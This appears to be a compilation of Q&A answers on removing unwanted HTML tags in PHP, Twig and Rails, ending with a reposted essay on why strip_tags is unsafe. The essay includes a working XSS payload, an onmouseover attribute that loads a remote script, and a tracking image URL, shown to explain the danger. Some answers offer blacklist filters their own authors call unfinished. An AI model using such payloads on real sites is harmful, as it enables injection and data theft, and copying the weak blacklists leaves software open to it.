Strip_Tags() Function Blacklist Rather Than Whitelist

strip_tags() function blacklist rather than whitelist

If you only wish to remove the <img> tags, you can use DOMDocument instead of strip_tags().

$dom = new DOMDocument();
$dom->loadHTML($your_html_string);

// Find all the <img> tags
$imgs = $dom->getElementsByTagName("img");

// And remove them
$imgs_remove = array();
foreach ($imgs as $img) {
$imgs_remove[] = $img;
}

foreach ($imgs_remove as $i) {
$i->parentNode->removeChild($i);
}
$output = $dom->saveHTML();

strip_tags disallow some tags

EDIT

To use the HTML Purifier HTML.ForbiddenElements config directive, it seems you would do something like:

require_once '/path/to/HTMLPurifier.auto.php';

$config = HTMLPurifier_Config::createDefault();
$config->set('HTML.ForbiddenElements', array('script','style','applet'));
$purifier = new HTMLPurifier($config);
$clean_html = $purifier->purify($dirty_html);

http://htmlpurifier.org/docs

HTML.ForbiddenElements should be set to an array. What I don't know is what form the array members should take:

array('script','style','applet')

Or:

array('<script>','<style>','<applet>')

Or... Something else?

I think it's the first form, without delimiters; HTML.AllowedElements uses a form of configuration string somewhat common to TinyMCE's valid elements syntax:

tinyMCE.init({
...
valid_elements : "a[href|target=_blank],strong/b,div[align],br",
...
});

So my guess is it's just the term, and no attributes should be provided (since you're banning the element... although there is a HTML.ForbiddenAttributes, too). But that's a guess.

I'll add this note from the HTML.ForbiddenAttributes docs, as well:

Warning: This directive complements %HTML.ForbiddenElements,
accordingly, check out that directive for a discussion of why you
should think twice before using this directive.

Blacklisting is just not as "robust" as whitelisting, but you may have your reasons. Just beware and be careful.

Without testing, I'm not sure what to tell you. I'll keep looking for an answer, but I will likely go to bed first. It is very late. :)


Although I think you really should use HTML Purifier and utilize it's HTML.ForbiddenElements configuration directive, I think a reasonable alternative if you really, really want to use strip_tags() is to derive a whitelist from the blacklist. In other words, remove what you don't want and then use what's left.

For instance:

function blacklistElements($blacklisted = '', &$errors = array()) {
if ((string)$blacklisted == '') {
$errors[] = 'Empty string.';
return array();
}

$html5 = array(
"<menu>","<command>","<summary>","<details>","<meter>","<progress>",
"<output>","<keygen>","<textarea>","<option>","<optgroup>","<datalist>",
"<select>","<button>","<input>","<label>","<legend>","<fieldset>","<form>",
"<th>","<td>","<tr>","<tfoot>","<thead>","<tbody>","<col>","<colgroup>",
"<caption>","<table>","<math>","<svg>","<area>","<map>","<canvas>","<track>",
"<source>","<audio>","<video>","<param>","<object>","<embed>","<iframe>",
"<img>","<del>","<ins>","<wbr>","<br>","<span>","<bdo>","<bdi>","<rp>","<rt>",
"<ruby>","<mark>","<u>","<b>","<i>","<sup>","<sub>","<kbd>","<samp>","<var>",
"<code>","<time>","<data>","<abbr>","<dfn>","<q>","<cite>","<s>","<small>",
"<strong>","<em>","<a>","<div>","<figcaption>","<figure>","<dd>","<dt>",
"<dl>","<li>","<ul>","<ol>","<blockquote>","<pre>","<hr>","<p>","<address>",
"<footer>","<header>","<hgroup>","<aside>","<article>","<nav>","<section>",
"<body>","<noscript>","<script>","<style>","<meta>","<link>","<base>",
"<title>","<head>","<html>"
);

$list = trim(strtolower($blacklisted));
$list = preg_replace('/[^a-z ]/i', '', $list);
$list = '<' . str_replace(' ', '> <', $list) . '>';
$list = array_map('trim', explode(' ', $list));

return array_diff($html5, $list);
}

Then run it:

$blacklisted = '<html> <bogus> <EM> em li ol';
$whitelist = blacklistElements($blacklisted);

if (count($errors)) {
echo "There were errors.\n";
print_r($errors);
echo "\n";
} else {
// Do strip_tags() ...
}

http://codepad.org/LV8ckRjd

So if you pass in what you don't want to allow, it will give you back the HTML5 element list in an array form that you can then feed into strip_tags() after joining it into a string:

$stripped = strip_tags($html, implode('', $whitelist)));

Caveat Emptor

Now, I've kind've hacked this together and I know there are some issues I haven't thought out yet. For instance, from the strip_tags() man page for the $allowable_tags argument:

Note:

This parameter should not contain whitespace. strip_tags() sees a tag
as a case-insensitive string between < and the first whitespace or >.
It means that strip_tags("<br/>", "<br>") returns an empty string.

It's late and for some reason I can't quite figure out what this means for this approach. So I'll have to think about that tomorrow. I also compiled the HTML element list in the function's $html5 element from this MDN documentation page. Sharp-eyed reader's might notice all of the tags are in this form:

<tagName>

I'm not sure how this will effect the outcome, whether I need to take into account variations in the use of a shorttag <tagName/> and some of the, ahem, odder variations. And, of course, there are more tags out there.

So it's probably not production ready. But you get the idea.

Use a function in twig like striptag but instead of whitelist tags, I want to blacklist tag(s)

Are you sure that it's a good idea to use a blacklist instead of a whitelist?

If you are, it's easy to create a custom Twig filter using this code by Michael Berkowski as a reference:

$twig->addFilter(new Twig_Filter('removetags', function($html, ...$tags) {
$dom = new DOMDocument();
$dom->loadHTML('<body>' . $html . '</body>', LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);

foreach ($tags as $tag) {
$elements = iterator_to_array($dom->getElementsByTagName($tag));

foreach ($elements as $el) {
$el->parentNode->removeChild($el);
}
}

return str_replace(['<body>', '</body>'], '', $dom->saveHTML());
}));

Then in Twig:

{% set html = 'hello <a href="#">world</a>, <em>how</em> <a>are</a> you?' %}

{{ html|raw }}
{{ html|removetags('a')|raw }}
{{ html|removetags('em')|raw }}
{{ html|removetags('a', 'em')|raw }}

The above produces this:

hello <a href="#">world</a>, <em>how</em> <a>are</a> you?

hello , <em>how</em> you?

hello <a href="#">world</a>, <a>are</a> you?

hello , you?

Some notes:

  • I named the filter as removetags because striptags is a built-in Twig filter.
  • I used LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD, because otherwise you'd get <!DOCTYPE html ...> and other extra tags in the output. See documentation of DOMDocument::loadHTML for more info.
  • I wrapped the loaded HTML into <body> tags and later removed them. Otherwise you'd get an extra <p> element in the output or the output could be broken in some other way. Kudos to this comment. (Using <html> tags didn't work for me, so I used <body> tags.)

How to strip HTML tags using a black list in PHP?

A simple compound regex search would work (if this is still about your previous issue):

$html =
preg_replace("#</?(font|strike|marquee|blink|del)[^>]*>#i", "", $html);

How to remove specific tags but leave allowed tags

Use Rails::Html::WhiteListSanitizer:

white_list_sanitizer = Rails::Html::WhiteListSanitizer.new
original = <<EOD
<div>
some text
<strong>text</strong>
<p>other text</p>
<img src="http://example.com" />
</div>
EOD

puts white_list_sanitizer.sanitize(original, tags: %w(p img))

Output:

some text
text
<p>other text</p>
<img src="http://example.com">

Adding efficiency my ip blacklist-whitelist script

Does this code do what you need?

$white = array(
'192.168.*.*',
'10.10.10.*',
);

$black = array(
'192.168.8.8',
'10.10.10.3',
'10.10.1.2',
);

$patterns = array();
foreach ($white as $subnetwork) {
$patterns[] = str_replace(array('.', '*'), array('\\.', '(\d{1,3})'), $subnetwork);
}

$notMatched = array();
foreach ($black as $ip) {
foreach ($patterns as $pattern) {
if (preg_match("/^{$pattern}$/", $ip)) {
continue 2;
}
}
$notMatched[] = $ip;
}

var_dump($notMatched);

It outputs:

array(1) {
[0]=>
string(9) "10.10.1.2"
}

PHP strip_tags accept all except script

Please don't use strip_tags, it is unsafe, and unreliable - read the following discussion on strip_tags for what you should use:

Strip_tags discussion on reddit.com

:: Details of Reddit post ::

strip_tags is one of the common go-to functions used for making user input on web pages safe for display. But contrary to what it sounds like it's for, strip_tags is never, ever, ever the right function to use for this and it has a lot of problems. Here's why:

  1. It can eat legitimate text. It turns "This shows that x<y." into
    "This shows that x", and unless it gets a closing '>' it will
    continue to eat the rest of the lines in the comment. (It prevents
    people from discussing HTML, for example.)
  2. It doesn't prevent typed HTML entities. People can (and do) exploit
    that to bypass word filters & spam filters.
  3. Using the second parameter to allow some tags is 100% dangerous. It
    starts out innocently: someone wants to permit simple formatting in
    user comments and does something like this:

What everyone should know about strip_tags()

strip_tags is one of the common go-to functions used for making user input on web pages safe for display. But contrary to what it sounds like it's for, strip_tags is never, ever, ever the right function to use for this and it has a lot of problems. Here's why:

  • It can eat legitimate text. It turns "This shows that x<y." into "This shows that x", and unless it gets a closing '>' it will continue to eat the rest of the lines in the comment. (It prevents people from discussing HTML, for example.)

  • It doesn't prevent typed HTML entities. People can (and do) exploit that to bypass word filters & spam filters.

  • Using the second parameter to allow some tags is 100% dangerous. It starts out innocently: someone wants to permit simple formatting in user comments and does something like this:

    $message = strip_tags($message, '');

But attributes on tags aren't removed. So I could come to your site and post a comment like this:

<b style="color:red;font-size:100pt;text-decoration:blink">hello</b>

Suddenly I can use whatever formatting I want. Or I could do this:

<b style="background:url(http://someserver/transparent.gif);font-weight:normal">hello</b>

Using that I can track users browsing your site without them or you knowing.

Or if I was particularly evil, I could do something like this:

<b onmouseover="s=document.createElement('script');s.src='http://pastebin.com/raw.php?i=j1Vhq2aJ';document.getElementsByTagName('head')[0].appendChild(s)">hello</b>

Using that I could inject my own script into your site, triggered by somebody's cursor moving over my comment. Such a script would run in the user's browser with the full privileges of the page, so it is very dangerous. It could steal or delete private user data. It could alter any part of the page, such as to display fake messages or shock images. It could exploit your site's reputation to trick users into downloading malware. A single comment could even spread across the site rapidly, virally by submitting new comments from the user who views it.

You can't overstate the danger of using that second parameter. If someone cared enough, it could be leveraged to wreak total havoc.

The second parameter doesn't work decently even for known safe text. Usage like strip_tags('text in which we want line breaks<br/>but no formatting', '<br>') still strips the break because it sees the '/' as part of the tag name.

If you simply want to prevent HTML and formatting in user-submitted input, to display text on a web page exactly as typed, the correct function is htmlspecialchars. Follow that with nl2br if you want to display multiple lines, otherwise the text will appear on one line. (++Edit: You should know what character set you're using (and if you don't, aim to use UTF-8 everywhere as it's becoming a web standard). If you're using a weird not-ASCII-compatible character set, you must specify that as the second parameter to htmlspecialchars for it to work properly.)

For when you want to allow formatting, there are proper pre-designed libraries out there for allowing safe use of various syntaxes, including HTML, Markdown, BBCode, and Wikitext.

For when you want to permit formatting, you should use a proper library designed for doing this. Markdown (as used on Reddit) is a user-friendly formatting syntax, but as flyingfirefox has explained below, it allows HTML and is not safe on its own. (It is a formatter and not a sanitizer). Use of HTML and/or Markdown for formatting can be made fully safe with a sanitizer like HTML Purifier, which does what strip_tags was supposed to do. BBCode is another option.

If you feel the need to make your own formatter, even a simple one, look at existing implementations to see what they do because there are a surprising number of subtleties involved in making them reliable and safe.

The only appropriate time to use strip_tags would be to remove HTML that was supposed to be there, and now you're converting to a non-HTML format. For example, if you have some content formatted as HTML and now you want to write it to a plain text file, then using strip_tags, followed by htmlspecialchars_decode or html_entity_decode will do that. (In this case, strip_tags won't have the flaw of removing legitimate text because the text should have already been properly escaped as entities when it was made into HTML in the first place.)

Generally, strip_tags is just the wrong function. Never use it. And if you do, absolutely never use the second parameter, because sooner or later someone will abuse it.



Related Topics



Leave a reply



Submit